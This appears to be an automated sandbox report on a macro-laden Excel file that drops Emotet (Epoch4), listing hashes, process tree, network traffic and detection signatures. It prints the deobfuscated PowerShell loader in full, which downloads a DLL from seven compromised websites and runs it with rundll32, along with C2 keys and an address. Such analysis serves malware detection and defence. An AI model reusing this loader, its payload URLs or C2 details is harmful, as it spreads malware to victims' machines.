Resubmissions

  • 24/11/2021, 17:59 UTC  211124-wk8rgsddbm  (score 10)
  • 22/11/2021, 14:46 UTC  211122-r5n6csagd6  (score 10)
  • 22/11/2021, 14:46 UTC  211122-r5csbsfgdp  (score 10)
  • 22/11/2021, 14:44 UTC  211122-r4kfsafgdn  (score 10)
  • 22/11/2021, 14:41 UTC  211122-r2x9vsfgcq  (score 10)
  • 22/11/2021, 14:20 UTC  211122-rneklaffgr  (score 10)
  • 22/11/2021, 14:15 UTC  211122-rkk8zaffgl  (score 10)
  • 17/11/2021, 06:51 UTC  211117-hm1l1aeefm  (score 10)
  • 17/11/2021, 06:37 UTC  211117-hdnk3seedn  (score 10)

Analysis

  • max time kernel
    21s
  • max time network
    21s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 14:46 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Language: ps1

Deobfuscated:

    # Deobfuscator output. In the original command line (see the cmd.exe / powershell.exe
    # entries in the process tree) $dfkj holds the whole script as one string and the
    # trailing IEX executes it; the tool has inlined that script here.
    $dfkj = $strs = "https://evgeniys.ru/sap-logs/D6/", "http://crownadvertising.ca/wp-includes/OxiAACCoic/", "https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/", "http://immoinvest.com.br/blog_old/wp-admin/luoT/", "https://yoho.love/wp-content/e4laFBDXIvYT6O/", "https://www.168801.xyz/wp-content/6J3CV4meLxvZP/", "https://www.pasionportufuturo.pe/wp-content/XUBS/"
    # Payload URLs are tried in order; the loop stops after the first successful download.
    foreach ($st in $strs) {
        $r1 = get-random
        $r2 = get-random
        # Random numeric file name under C:\ProgramData (e.g. 2082074918.dll in this run)
        $tpth = "C:\ProgramData\" + $r1 + ".dll"
        invoke-webrequest -uri $st -outfile $tpth
        if (test-path $tpth) {
            # Load the dropped DLL through 32-bit rundll32 with a random export name
            $fp = "C:\Windows\SysWow64\rundll32.exe"
            $a = $tpth + ",f" + $r2
            start-process "C:\Windows\SysWow64\rundll32.exe" -argumentlist $a
            break
        }
    }
    invoke-expression $dfkj
URLs

The seven payload URLs are the ones listed in the deobfuscated script above; each is tagged exe.dropper.

Extracted

Family

emotet

Botnet

Epoch4

C2

eck1.plain

    -----BEGIN PUBLIC KEY-----
    MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
    TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
    -----END PUBLIC KEY-----

ecs1.plain

    -----BEGIN PUBLIC KEY-----
    MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
    pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
    -----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\2082074918.dll,f256876290
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1808
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\2082074918.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bxachutoyjs\unzedrunujmobju.rov",QnYEvEaWkGYXF
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1516
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bxachutoyjs\unzedrunujmobju.rov",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3188

Network

  • DNS (US)
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    40.119.148.38
  • DNS (US)
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • DNS (US)
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • GET (US)
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 22 Nov 2021 14:52:51 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Mon, 22 Nov 2021 14:52:51 GMT
    Content-Disposition: attachment; filename="aoSbYZ.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 619baec372a01=1637592771; expires=Mon, 22-Nov-2021 14:53:51 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Mon, 22 Nov 2021 14:52:51 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • GET (PL)
    https://91.200.186.228/YqsbUCnLRVkcHeu
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /YqsbUCnLRVkcHeu HTTP/1.1
    Cookie: CHeeBoZsSXJd=D2SVt9gbcJ2TNRE279N5LPJT41jGL11LYgJx07BajJldlUc5+W/yQGRsI3wl+tjiJ6nuwYuPWTkPAlLFqSJvlK9a7Q0tC8LVdmtksORbgViB+IEt3Am1ZGtIMvkAMGOAd0kLjGyJwydfR9TbAnEIjFRazN9AJhHg0TuI1glUGsVBW0VallnnvdzHYMpFeHl6O/M11V9P2gkjgQTjw9Se8ADDGQ/gyf+/kapZ4cMJYyH+wjgUUMWR6ZHj
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 22 Nov 2021 14:46:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 52.109.8.20:443
    322 B
    7
  • 159.253.18.185:443
    evgeniys.ru
    tls
    powershell.exe
    668 B
    5.0kB
    9
    8
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    http
    powershell.exe
    4.8kB
    266.7kB
    100
    186

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/YqsbUCnLRVkcHeu
    tls, http
    rundll32.exe
    1.0kB
    2.6kB
    8
    7

    HTTP Request

    GET https://91.200.186.228/YqsbUCnLRVkcHeu

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    40.119.148.38

  • 40.119.148.38:123
    time.windows.com
    ntp
    76 B
    1
  • 8.8.8.8:53
    evgeniys.ru
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    crownadvertising.ca
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7

Downloads

  • memory/1808-359-0x0000000010000000-0x0000000010028000-memory.dmp  (160KB)
  • memory/2416-299-0x000002364D503000-0x000002364D505000-memory.dmp  (8KB)
  • memory/2416-300-0x000002364D506000-0x000002364D508000-memory.dmp  (8KB)
  • memory/2416-333-0x000002364D508000-0x000002364D509000-memory.dmp  (4KB)
  • memory/2416-298-0x000002364D500000-0x000002364D502000-memory.dmp  (8KB)
  • memory/4024-118-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp  (64KB)
  • memory/4024-132-0x00007FF7F5D90000-0x00007FF7F5DA0000-memory.dmp  (64KB)
  • memory/4024-125-0x000001CDE3620000-0x000001CDE3622000-memory.dmp  (8KB)
  • memory/4024-124-0x000001CDE3620000-0x000001CDE3622000-memory.dmp  (8KB)
  • memory/4024-123-0x000001CDE3620000-0x000001CDE3622000-memory.dmp  (8KB)
  • memory/4024-122-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp  (64KB)
  • memory/4024-121-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp  (64KB)
  • memory/4024-120-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp  (64KB)
  • memory/4024-119-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp  (64KB)
  • memory/4024-131-0x00007FF7F5D90000-0x00007FF7F5DA0000-memory.dmp  (64KB)
